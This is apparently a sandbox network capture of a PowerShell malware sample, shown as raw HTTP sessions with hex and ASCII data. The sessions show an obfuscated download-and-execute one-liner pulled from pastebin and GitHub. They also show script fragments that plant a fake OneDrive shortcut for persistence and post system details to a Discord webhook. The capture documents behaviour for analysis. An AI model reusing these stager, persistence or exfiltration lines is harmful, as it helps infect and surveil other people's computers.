                                                                                                2024-10-15 13:54:51 UTC212OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 2a 2a 68 61 72 64 7a 2a 2a 20 68 61 73 20 6a 6f 69 6e 65 64 20 2d 20 67 74 61 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 5f 44 45 45 43 5a 47 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 22 0d 0a 7d
                                                                                                Data Ascii: { "content": "**user** has joined - gta\n----------------------------------\n**GPU:** _DEECZG\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4"}
                                                                                                2024-10-15 13:54:51 UTC1269INHTTP/1.1 404 Not Found
                                                                                                Date: Tue, 15 Oct 2024 13:54:51 GMT
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 45
                                                                                                Connection: close
                                                                                                Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                x-ratelimit-limit: 5
                                                                                                x-ratelimit-remaining: 4
                                                                                                x-ratelimit-reset: 1729000492
                                                                                                x-ratelimit-reset-after: 1
                                                                                                via: 1.1 google
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F69Dnzw0wq7RtVEVpxbkNq5hZzTXGWno7esEgWayh6fA9Pyjs1jcnbLrvJVolv96jC%2FyNTHFmtbAl%2FDU9AmsmkW%2BrbKA%2F1Lzf%2B4Vf8kAAPAO%2BV%2Br5BSN3%2BBk7Bo%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Set-Cookie: __cfruid=69022a55f2b8783d0d63679e0838c8b202ffbc2e-1729000491; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                Set-Cookie: _cfuvid=WlDXhfnKcSPqw_2Ei8YQ4SyVmTX.S.GQxnEfCc7UuGo-1729000491258-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d304dadbbc04692-DFW
                                                                                                2024-10-15 13:54:51 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.362864104.20.3.2354434116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-15 13:54:55 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031
                                                                                                Host: pastebin.com
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-15 13:54:56 UTC397INHTTP/1.1 200 OK
                                                                                                Date: Tue, 15 Oct 2024 13:54:56 GMT
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-frame-options: DENY
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1;mode=block
                                                                                                cache-control: public, max-age=1801
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 146
                                                                                                Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d304dcc5fbe2cb4-DFW
                                                                                                2024-10-15 13:54:56 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                                                Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                                                2024-10-15 13:54:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                4192.168.2.362866185.199.110.1334434116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-15 13:54:57 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031
                                                                                                Host: raw.githubusercontent.com
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-15 13:54:57 UTC902INHTTP/1.1 200 OK
                                                                                                Connection: close
                                                                                                Content-Length: 7508
                                                                                                Cache-Control: max-age=300
                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-Frame-Options: deny
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                                                Accept-Ranges: bytes
                                                                                                Date: Tue, 15 Oct 2024 13:54:57 GMT
                                                                                                Via: 1.1 varnish
                                                                                                X-Served-By: cache-dfw-kdfw8210074-DFW
                                                                                                X-Cache: HIT
                                                                                                X-Cache-Hits: 1
                                                                                                X-Timer: S1729000498.930482,VS0,VE1
                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                X-Fastly-Request-ID: ad08c80caa3dcb5728cc61fb15b0ffd836f95083
                                                                                                Expires: Tue, 15 Oct 2024 13:59:57 GMT
                                                                                                Source-Age: 145
                                                                                                2024-10-15 13:54:57 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                                                Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                                                2024-10-15 13:54:57 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                                                Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                                                2024-10-15 13:54:57 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                                                Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                                                2024-10-15 13:54:57 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                                                Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                                                2024-10-15 13:54:57 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                                                Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                                                2024-10-15 13:54:57 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                                                Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                5192.168.2.362868104.20.3.2354437688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-15 13:55:03 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031
                                                                                                Host: pastebin.com
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-15 13:55:03 UTC397INHTTP/1.1 200 OK
                                                                                                Date: Tue, 15 Oct 2024 13:55:03 GMT
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-frame-options: DENY
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1;mode=block
                                                                                                cache-control: public, max-age=1801
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 153
                                                                                                Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d304df98ae32e17-DFW
                                                                                                2024-10-15 13:55:03 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                                                Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                                                2024-10-15 13:55:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                6192.168.2.362870185.199.110.1334437688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-15 13:55:04 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031
                                                                                                Host: raw.githubusercontent.com
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-15 13:55:05 UTC902INHTTP/1.1 200 OK
                                                                                                Connection: close
                                                                                                Content-Length: 7508
                                                                                                Cache-Control: max-age=300
                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-Frame-Options: deny
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                                                Accept-Ranges: bytes
                                                                                                Date: Tue, 15 Oct 2024 13:55:05 GMT
                                                                                                Via: 1.1 varnish
                                                                                                X-Served-By: cache-dfw-kdal2120125-DFW
                                                                                                X-Cache: HIT
                                                                                                X-Cache-Hits: 1
                                                                                                X-Timer: S1729000505.278943,VS0,VE1
                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                X-Fastly-Request-ID: 367c21d51ac736814380477f6398ee9134968b44
                                                                                                Expires: Tue, 15 Oct 2024 14:00:05 GMT
                                                                                                Source-Age: 152
                                                                                                2024-10-15 13:55:05 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                                                Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                                                2024-10-15 13:55:05 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                                                Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                                                2024-10-15 13:55:05 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                                                Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                                                2024-10-15 13:55:05 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                                                Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                                                2024-10-15 13:55:05 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                                                Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
